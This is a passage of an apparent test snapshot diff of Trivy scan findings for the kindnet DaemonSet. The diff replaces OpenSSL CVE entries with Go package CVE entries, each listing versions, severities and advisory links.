"https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "https://linux.oracle.com/cve/CVE-2022-27191.html", + "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "https://pkg.go.dev/vuln/GO-2021-0356", + "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "https://security.netapp.com/advisory/ntap-20220429-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-27191", + ], + }, + "category": "Vulnerability", + "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "crash in a golang.org/x/crypto/ssh server", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://avd.aquasec.com/nvd/cve-2022-27191", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://access.redhat.com/errata/RHSA-2022:8008", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://access.redhat.com/security/cve/CVE-2022-27191", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://bugzilla.redhat.com/1939485", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://bugzilla.redhat.com/1989564", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://bugzilla.redhat.com/1989570", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://bugzilla.redhat.com/1989575", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://bugzilla.redhat.com/2064702", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://bugzilla.redhat.com/2121445", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://bugzilla.redhat.com/2121453", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://go.dev/cl/392355", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4304.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", + "value": "https://pkg.go.dev/vuln/GO-2021-0356", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4304", + "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0465", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "0.0.0-20210520170846-37e1c6afe023", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-33194", + "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0465", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0465", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", + "https://access.redhat.com/security/cve/CVE-2021-33194", + "https://github.com/advisories/GHSA-83g2-8m93-v3w7", + "https://github.com/golang/net/commit/37e1c6afe02340126705deced573a85ab75209d7", + "https://go.dev/cl/311090", + "https://go.dev/issue/46288", + "https://go.googlesource.com/net/+/37e1c6afe02340126705deced573a85ab75209d7", + "https://groups.google.com/g/golang-announce/c/wPunbCPkWUg", + "https://groups.google.com/g/golang-dev/c/28x0nthP-c8/m/KqWVTjsnBAAJ", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4CHKSFMHZVOBCZSSVRE3UEYNKARTBMTM/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33194", + "https://pkg.go.dev/vuln/GO-2021-0238", + "https://www.cve.org/CVERecord?id=CVE-2021-33194", ], }, "category": "Vulnerability", - "description": "Applications that use a non-default option when verifying certificates may be -vulnerable to an attack from a malicious CA to circumvent certain checks. - -Invalid certificate policies in leaf certificates are silently ignored by -OpenSSL and other certificate policy checks are skipped for that certificate. -A malicious CA could use this to deliberately assert invalid certificate policies -in order to circumvent policy checking on the certificate altogether. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", + "description": "golang.org/x/net before v0.0.0-20210520170846-37e1c6afe023 allows attackers to cause a denial of service (infinite loop) via crafted ParseFragment input.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "Invalid certificate policies in leaf certificates are silently ignored", + "name": "golang: x/net/html: infinite loop in ParseFragment", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0465", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0465", + "value": "https://avd.aquasec.com/nvd/cve-2021-33194", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "value": "https://access.redhat.com/security/cve/CVE-2021-33194", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "value": "https://github.com/advisories/GHSA-83g2-8m93-v3w7", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "value": "https://github.com/golang/net/commit/37e1c6afe02340126705deced573a85ab75209d7", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "value": "https://go.dev/cl/311090", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "value": "https://go.dev/issue/46288", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://go.googlesource.com/net/+/37e1c6afe02340126705deced573a85ab75209d7", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "value": "https://groups.google.com/g/golang-announce/c/wPunbCPkWUg", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://groups.google.com/g/golang-dev/c/28x0nthP-c8/m/KqWVTjsnBAAJ", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4CHKSFMHZVOBCZSSVRE3UEYNKARTBMTM/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33194", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://pkg.go.dev/vuln/GO-2021-0238", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33194", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0466", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "0.0.0-20211209124913-491a49abca63", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-44716", + "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0466", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0466", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", + "https://access.redhat.com/security/cve/CVE-2021-44716", + "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "https://go.dev/cl/369794", + "https://go.dev/issue/50058", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "https://linux.oracle.com/cve/CVE-2021-44716.html", + "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "https://pkg.go.dev/vuln/GO-2022-0288", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220121-0002/", + "https://www.cve.org/CVERecord?id=CVE-2021-44716", ], }, "category": "Vulnerability", - "description": "The function X509_VERIFY_PARAM_add0_policy() is documented to -implicitly enable the certificate policy check when doing certificate -verification. However the implementation of the function does not -enable the check which allows certificates with invalid or incorrect -policies to pass the certificate verification. - -As suddenly enabling the policy check could break existing deployments it was -decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() -function. - -Instead the applications that require OpenSSL to perform certificate -policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly -enable the policy check by calling X509_VERIFY_PARAM_set_flags() with -the X509_V_FLAG_POLICY_CHECK flag argument. - -Certificate policy checks are disabled by default in OpenSSL and are not -commonly used by applications.", + "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "Certificate policy check not enabled", + "name": "golang: net/http: limit growth of header canonicalization cache", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0466", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0466", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "value": "https://avd.aquasec.com/nvd/cve-2021-44716", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "value": "https://access.redhat.com/security/cve/CVE-2021-44716", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://go.dev/cl/369794", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://go.dev/issue/50058", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-6755", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", - "references": [ - "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", - "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", - "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", - "http://rump2007.cr.yp.to/15-shumow.pdf", - "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", - "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", - "http://www.securityfocus.com/bid/63657", - "https://access.redhat.com/security/cve/CVE-2007-6755", - "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", - "https://www.cve.org/CVERecord?id=CVE-2007-6755", - "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", - ], - }, - "category": "Vulnerability", - "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Dual_EC_DRBG: weak pseudo random number generator", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-6755", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, { "type": "URL", - "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", }, { "type": "URL", - "value": "http://rump2007.cr.yp.to/15-shumow.pdf", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", }, { "type": "URL", - "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", }, { "type": "URL", - "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/63657", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2007-6755", + "value": "https://pkg.go.dev/vuln/GO-2022-0288", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", }, { "type": "URL", - "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-0928", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", + "packageName": "golang.org/x/net", "references": [ - "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", - "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", - "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", - "http://www.osvdb.org/62808", - "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", - "https://access.redhat.com/security/cve/CVE-2010-0928", - "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", - "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", - "https://www.cve.org/CVERecord?id=CVE-2010-0928", + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", ], }, "category": "Vulnerability", - "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "openssl: RSA authentication weakness", + "name": "handle server errors after sending GOAWAY", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-0928", - }, - { - "type": "URL", - "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "http://www.osvdb.org/62808", + "value": 